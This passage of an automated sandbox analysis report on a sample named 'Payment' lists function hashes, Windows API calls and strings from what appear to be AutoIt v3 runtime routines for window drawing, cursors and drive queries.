                                                          • Opcode ID: 5c8057ef16910519812d702391704bad02c21d457a42a82b06807a3b34f5a460
                                                          • Instruction ID: 43658062dd9b81068584cf750f7082b7dcf36e37002918dd67388fcc93066129
                                                          • Opcode Fuzzy Hash: 5c8057ef16910519812d702391704bad02c21d457a42a82b06807a3b34f5a460
                                                          • Instruction Fuzzy Hash: E1128E30600201EFDB25CF24C984BA9BFE5FF55311F5446AAE996DB2A2CB31EC42DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00B477F1
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B478B0
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B478EE
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B47900
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B47946
                                                          • GetClientRect.USER32(00000000,?), ref: 00B47952
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B47996
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B479A5
                                                          • GetStockObject.GDI32(00000011), ref: 00B479B5
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B479B9
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B479C9
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B479D2
                                                          • DeleteDC.GDI32(00000000), ref: 00B479DB
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B47A07
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B47A1E
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B47A59
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B47A6D
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B47A7E
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B47AAE
                                                          • GetStockObject.GDI32(00000011), ref: 00B47AB9
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B47AC4
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B47ACE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 75f7a2fac45b8222dbb512c777d563f07a51ce6fa269a920e157de5fd43db6a7
                                                          • Instruction ID: bab8009366b4b85ffea1510edc0f0ae010f5b3952242710d31e05742d403a1ce
                                                          • Opcode Fuzzy Hash: 75f7a2fac45b8222dbb512c777d563f07a51ce6fa269a920e157de5fd43db6a7
                                                          • Instruction Fuzzy Hash: 48A17E71A40219BFEB14DBA4DD4AFAFBBB9EB48711F004155FA15A72E1DB70AD00CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B3AF89
                                                          • GetDriveTypeW.KERNEL32(?,00B5FAC0,?,\\.\,00B5F910), ref: 00B3B066
                                                          • SetErrorMode.KERNEL32(00000000,00B5FAC0,?,\\.\,00B5F910), ref: 00B3B1C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 1f9f5a6409fb2929eaf75ee2b2117402a8d2e2aeebd4153045572a6092a3bfd0
                                                          • Instruction ID: 39f67595aaf821bef7ba1f3cb2669c8ca4ec79a4ad4bfd6326aeb390bb64def3
                                                          • Opcode Fuzzy Hash: 1f9f5a6409fb2929eaf75ee2b2117402a8d2e2aeebd4153045572a6092a3bfd0
                                                          • Instruction Fuzzy Hash: 00518434694B05AB9B04EB10CA92E7D73F1EB14741F3040D7E60AB72B4DBB5AD41DB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: 10fdb5769f811503aaf7fbfe08f80b73ef2d34bd541d8397875137001037914e
                                                          • Instruction ID: 39470aa07913badf078dac108eb01d9169e679ec5d4e3511e5bb2e1699364f15
                                                          • Opcode Fuzzy Hash: 10fdb5769f811503aaf7fbfe08f80b73ef2d34bd541d8397875137001037914e
                                                          • Instruction Fuzzy Hash: 67813D71640205BADB24BB60CE82FBE7BA8EF14740F044067FE57AB2D2EB61DE45C651
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 00B5AB99
                                                          • SetTextColor.GDI32(?,?), ref: 00B5AB9D
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B5ABB3
                                                          • GetSysColor.USER32(0000000F), ref: 00B5ABBE
                                                          • CreateSolidBrush.GDI32(?), ref: 00B5ABC3
                                                          • GetSysColor.USER32(00000011), ref: 00B5ABDB
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B5ABE9
                                                          • SelectObject.GDI32(?,00000000), ref: 00B5ABFA
                                                          • SetBkColor.GDI32(?,00000000), ref: 00B5AC03
                                                          • SelectObject.GDI32(?,?), ref: 00B5AC10
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B5AC2F
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B5AC46
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B5AC5B
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B5ACA7
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B5ACCE
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00B5ACEC
                                                          • DrawFocusRect.USER32(?,?), ref: 00B5ACF7
                                                          • GetSysColor.USER32(00000011), ref: 00B5AD05
                                                          • SetTextColor.GDI32(?,00000000), ref: 00B5AD0D
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B5AD21
                                                          • SelectObject.GDI32(?,00B5A869), ref: 00B5AD38
                                                          • DeleteObject.GDI32(?), ref: 00B5AD43
                                                          • SelectObject.GDI32(?,?), ref: 00B5AD49
                                                          • DeleteObject.GDI32(?), ref: 00B5AD4E
                                                          • SetTextColor.GDI32(?,?), ref: 00B5AD54
                                                          • SetBkColor.GDI32(?,?), ref: 00B5AD5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 021113a80422ea2217188714de6837bffda657ea6c1836986eb437cac744fb2e
                                                          • Instruction ID: 90af68c230d11f997c43c7a6ee7710282302cc04ce6efdb5b3929abc5c17ff4e
                                                          • Opcode Fuzzy Hash: 021113a80422ea2217188714de6837bffda657ea6c1836986eb437cac744fb2e
                                                          • Instruction Fuzzy Hash: FE615071900219EFDF119FA4DC48FAEBBB9EB08321F1442A5F915BB2A1DA719D40DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B58D34
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B58D45
                                                          • CharNextW.USER32(0000014E), ref: 00B58D74
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B58DB5
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B58DCB
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B58DDC
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B58DF9
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B58E45
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B58E5B
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B58E8C
                                                          • _memset.LIBCMT ref: 00B58EB1
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B58EFA
                                                          • _memset.LIBCMT ref: 00B58F59
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B58F83
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B58FDB
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00B59088
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B590AA
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B590F4
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B59121
                                                          • DrawMenuBar.USER32(?), ref: 00B59130
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B59158
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 6ea618c932f24edcbba301190a94dd06cec2443db9fb997e21ab30f402c07d07
                                                          • Instruction ID: fabaef655d14ccb0aa41db35231526d431fc639c3d3377a5c09003a4af06ea15
                                                          • Opcode Fuzzy Hash: 6ea618c932f24edcbba301190a94dd06cec2443db9fb997e21ab30f402c07d07
                                                          • Instruction Fuzzy Hash: D4E15E71900219AADF219F64CC84BFE7BF9EF05711F1081D9FE15AA291DB708A89DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00B54C51
                                                          • GetDesktopWindow.USER32 ref: 00B54C66
                                                          • GetWindowRect.USER32(00000000), ref: 00B54C6D
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B54CCF
                                                          • DestroyWindow.USER32(?), ref: 00B54CFB
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B54D24
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B54D42
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B54D68
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00B54D7D
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B54D90
                                                          • IsWindowVisible.USER32(?), ref: 00B54DB0
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B54DCB
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B54DDF
                                                          • GetWindowRect.USER32(?,?), ref: 00B54DF7
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00B54E1D
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00B54E37
                                                          • CopyRect.USER32(?,?), ref: 00B54E4E
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00B54EB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: 6aae2d3568ba7e1ac0f11de811899a63981c23ac0002ad8df79654a39687903b
                                                          • Instruction ID: 9ed37040fb54c46b53709d4091202e81198145cc26b9f46d4b59b9516de3d46d
                                                          • Opcode Fuzzy Hash: 6aae2d3568ba7e1ac0f11de811899a63981c23ac0002ad8df79654a39687903b
                                                          • Instruction Fuzzy Hash: F2B16A71604341AFDB04DF24C945B6ABBE4FF88315F00899DF99A9B2A1DB70DC49CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B346E8
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B3470E
                                                          • _wcscpy.LIBCMT ref: 00B3473C
                                                          • _wcscmp.LIBCMT ref: 00B34747
                                                          • _wcscat.LIBCMT ref: 00B3475D
                                                          • _wcsstr.LIBCMT ref: 00B34768
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B34784
                                                          • _wcscat.LIBCMT ref: 00B347CD
                                                          • _wcscat.LIBCMT ref: 00B347D4
                                                          • _wcsncpy.LIBCMT ref: 00B347FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: db5a4d083a835d2265d6dd3dc5c9fbe2e6311a4ce0aa65dc4ee0c38e5179c5ea
                                                          • Instruction ID: 69a6b368233cb6eca578f22acda686e434ae309d8806bf246a8b5e0a36bea24a
                                                          • Opcode Fuzzy Hash: db5a4d083a835d2265d6dd3dc5c9fbe2e6311a4ce0aa65dc4ee0c38e5179c5ea
                                                          • Instruction Fuzzy Hash: 6A41E972600209BAEB10BBA48D43FBF77FCDF45710F1401A6FA05E6192EF75AA0197A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AD28BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 00AD28C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AD28EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 00AD28F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 00AD291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AD2939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AD2949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AD297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AD2990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00AD29AE
                                                          • GetStockObject.GDI32(00000011), ref: 00AD29CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AD29D5
                                                            • Part of subcall function 00AD2344: GetCursorPos.USER32(?), ref: 00AD2357
                                                            • Part of subcall function 00AD2344: ScreenToClient.USER32(00B967B0,?), ref: 00AD2374
                                                            • Part of subcall function 00AD2344: GetAsyncKeyState.USER32(00000001), ref: 00AD2399
                                                            • Part of subcall function 00AD2344: GetAsyncKeyState.USER32(00000002), ref: 00AD23A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00AD1256), ref: 00AD29FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: 6f797746d0615d5aaa5103d0ae86ba2bb77a3806701585a8b32eba8de69613c3
                                                          • Instruction ID: 6959fb0398b65533462152b18fbaacb573e4333d3e483392e981b7e33a93fc31
                                                          • Opcode Fuzzy Hash: 6f797746d0615d5aaa5103d0ae86ba2bb77a3806701585a8b32eba8de69613c3
                                                          • Instruction Fuzzy Hash: 47B15271A0020AEFDB14DFA8DD45BAE7BB4FB18315F10826AFA16D72E0DB749841CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00B540F6
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B541B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 374479c23e59ba8218d3fa41bb71d37a14a6e64b4e5991232100cd8429ddc014
                                                          • Instruction ID: 281fc05b09b60dc380f8d60ca618f19471c08ade71a5944f0a4bc87ca394c61a
                                                          • Opcode Fuzzy Hash: 374479c23e59ba8218d3fa41bb71d37a14a6e64b4e5991232100cd8429ddc014
                                                          • Instruction Fuzzy Hash: 9FA16E302142159FCB14EF20CA91F6AB7E5BF45319F1449E9B89A9B7A2DB30EC49CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00B45309
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00B45314
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B4531F
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00B4532A
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00B45335
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00B45340
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00B4534B
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00B45356
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00B45361
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00B4536C
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00B45377
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00B45382
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00B4538D
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00B45398
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00B453A3
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00B453AE
                                                          • GetCursorInfo.USER32(?), ref: 00B453BE
                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00B453E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 07be97df1318ec957f1322b5194b66d981637fd1b3cfe2f2e0b85a00e78bcd4f
                                                          • Instruction ID: 6b2462db604e8092c5849486d23153671f6a22468a9767d84c60c030b9db865c
                                                          • Opcode Fuzzy Hash: 07be97df1318ec957f1322b5194b66d981637fd1b3cfe2f2e0b85a00e78bcd4f
                                                          • Instruction Fuzzy Hash: C3418370E043196BDB209FBA8C4996FFFF8EF41B50B10452FF509E7291DAB895018E61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B2AAA5
                                                          • __swprintf.LIBCMT ref: 00B2AB46
                                                          • _wcscmp.LIBCMT ref: 00B2AB59
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B2ABAE
                                                          • _wcscmp.LIBCMT ref: 00B2ABEA
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00B2AC21
                                                          • GetDlgCtrlID.USER32(?), ref: 00B2AC73
                                                          • GetWindowRect.USER32(?,?), ref: 00B2ACA9
                                                          • GetParent.USER32(?), ref: 00B2ACC7
                                                          • ScreenToClient.USER32(00000000), ref: 00B2ACCE
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B2AD48
                                                          • _wcscmp.LIBCMT ref: 00B2AD5C
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B2AD82
                                                          • _wcscmp.LIBCMT ref: 00B2AD96
                                                            • Part of subcall function 00AF386C: _iswctype.LIBCMT ref: 00AF3874
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
